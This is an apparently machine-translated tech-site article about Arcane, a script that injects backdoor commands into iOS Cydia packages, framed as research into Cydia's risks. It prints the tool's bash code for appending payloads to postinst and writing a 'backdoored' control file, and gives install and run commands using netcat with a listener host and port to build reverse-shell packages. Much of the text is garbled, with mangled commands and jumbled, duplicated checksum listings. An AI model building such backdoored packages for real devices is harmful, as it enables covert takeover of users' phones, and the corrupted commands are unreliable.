Shulou(Shulou.com)06/02 Report--

This article mainly explains "how to use Arcane tools". The content of the explanation is simple and clear, and it is easy to learn and understand. Please follow the editor's train of thought to study and learn "how to use Arcane tools".

Arcane

Arcane is a security tool for iOS packages (iphone-arm). In essence, Arcane is a simple and small script that can help researchers create the necessary resources for APT repositories. The main purpose of this tool is to make people understand why using Cydia is a very dangerous behavior, because cyber criminals can use iOS packets to carry out post-penetration attacks on iOS devices with security risks.

Arcane working mechanism

To help you understand the working mechanism behind Arcane, let's first extract an iOS package created by Arcane:

Dpkg-deb-R / tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb / tmp/whois-decomp

Here, you need to pay attention to the control file and postinst file in the DEBIAN directory, both of which are very important:

Tree / tmp/whois-decomp/ / tmp/whois-decomp/ ├── DEBIAN │ ├── control │ └── postinst └── usr └── bin └── whois

With the help of Arcane, we can easily embed malicious scripts into an iOS package directly during the installation or removal of the application. The package maintenance scripts supported here support preinst, postinst, prerm, and postrm files. Arcane can use the postinst file to execute arbitrary commands during installation of the iOS package.

The following is an example of the "post-installation" file. This file executes commands on the target device after the application package is installed. Attackers can use this file to manage or maintain various operations during installation, and Arcane can use this feature to inject malicious Bash commands into iOS packages.

Postinst= "$tmp/DEBIAN/postinst"; # A function to handle the type of command execution embedded into the# postinst file.function inject_backdoor () {# If-- file is used, `cat`the command (s) into the postinst file. If [["$infile"]]; then cat "$infile" > > "$postinst"; embed= "[$infile]"; else # If no-file, utilize the simple Bash payload, previously # defined. Echo-e "$payload" > > "$postinst"; embed= "generic shell command"; fi; status "embedded $embed into postinst"error embedding backdoor"; chmod 0755 "$postinst"}

During the iOS package installation, the package management tool will use the values contained in the control file. Arcane will be able to modify an existing control file or create a new control file. The following is a sample control file, and most iOS packages contain a control file. Here, Arcane will use the sample control file shown below, where the "$hacker" variable is used to implement arbitrary data placeholders.

# https://www.debian.org/doc/manuals/maint-guide/dreq.en.htmlcontrolTemp="Package: com.$hacker.backdoorName: $hacker backdoorVersion: 1337Section: appArchitecture: iphoneos-armDescription: A backdoored iOS packageAuthor: $hacker Maintainer: $hacker ";... # An `if` statement to check for the control file.if [!-f" $tmp/DEBIAN/control "]; then # If no control is detected, create it using the template. Echo "$controlTemp" > "$tmp/DEBIAN/control"; status "created control file"error with control template"; else # If a control file exists, Arcane will simply rename the package # as it appears in the list of available Cydia applications. This # makes the package easier to location in Cydia. Msg "detected control file" succ; sed-I'0J / ^ Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control"; status "modified control file"error with control"; download the fi; tool

Researchers can use the following commands to clone the source code of the project locally:

Using the git clone https://github.com/tokyoneon/Arcane.git tool

We recommend that the majority of users use Arcane in the Kaili v2020.3 operating system. The tool configuration and usage commands are as follows:

Sudo apt-get update; sudo apt-get install-Vy bzip2 netcat-traditional dpkg coreutils # dependenciessudo git clone https://github.com/tokyoneon/arcane / opt/arcanesudo chown $USER:$USER-R / opt/arcane/; cd / opt/arcanechmod + x arcane.sh;./arcane.sh-- help

Next, we can embed malicious control instructions into a given iOS package using the following command:

. / arcane.sh-- input samples/sed_4.5-1_iphoneos-arm.deb-- lhost-- lport-- cydia-- netcat

For more detailed instructions, you can refer to this [manual].

Sample iOS package

The following iOS packages are available in Arcane's code base for testing by a wide range of researchers:

Ls-la samples/-rw-r--r-- 1 root root 100748 Jul 17 18:39 libapt-pkg-dev_1.8.2.1-1 root root 142520 Jul 22 06:21 network-cmds_543-1 root root 76688 Aug 29 2018 sed_4.5-1 network-cmds_543-1 root root 60866 Jul 8 21:03 top_39-2 MD5:md5sum samples/*.deb 3f1712964701580b3f018305a55e217c samples/libapt-pkg-dev_1.8.2.1 MD5:md5sum samples/*.deb 3f1712964701580b3f018305a55e217c samples/libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb795ccf9c6d53dd60d2f74f7a601f474f samples/network-cmds_543-1_iphoneos-arm.deba020882dac121afa4b03c63304d729b0 samples/sed_4.5-1_iphoneos-arm.deb38db275007a331e7ff8899ea22261dc7 samples/ of the iOS sample package is shown below: top_39-2 MD5:md5sum samples/*.deb 3f1712964701580b3f018305a55e217c samples/libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb795ccf9c6d53dd60d2f74f7a601f474f samples/network-cmds_543-1_iphoneos-arm.deba020882dac121afa4b03c63304d729b0 samples/sed_4.5-1_iphoneos-arm.deb38db275007a331e7ff8899ea22261dc7 samples/-1 1_iphoneos-arm.deb795ccf9c6d53dd60d2f74f7a601f474f samples/network-cmds_543 13810 Aug 29 2018 whois_5.3.2-1_iphoneos-arm.deb38db275007a331e7ff8899ea22261dc7 samples/ Top_39-2_iphoneos-arm.debb40ee800b72bbac323568b36ad67bb16 samples/whois_5.3.2-1_iphoneos-arm.deb Thank you for your reading The above is the content of "how to use Arcane tools". After the study of this article, I believe you have a deeper understanding of how to use Arcane tools, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.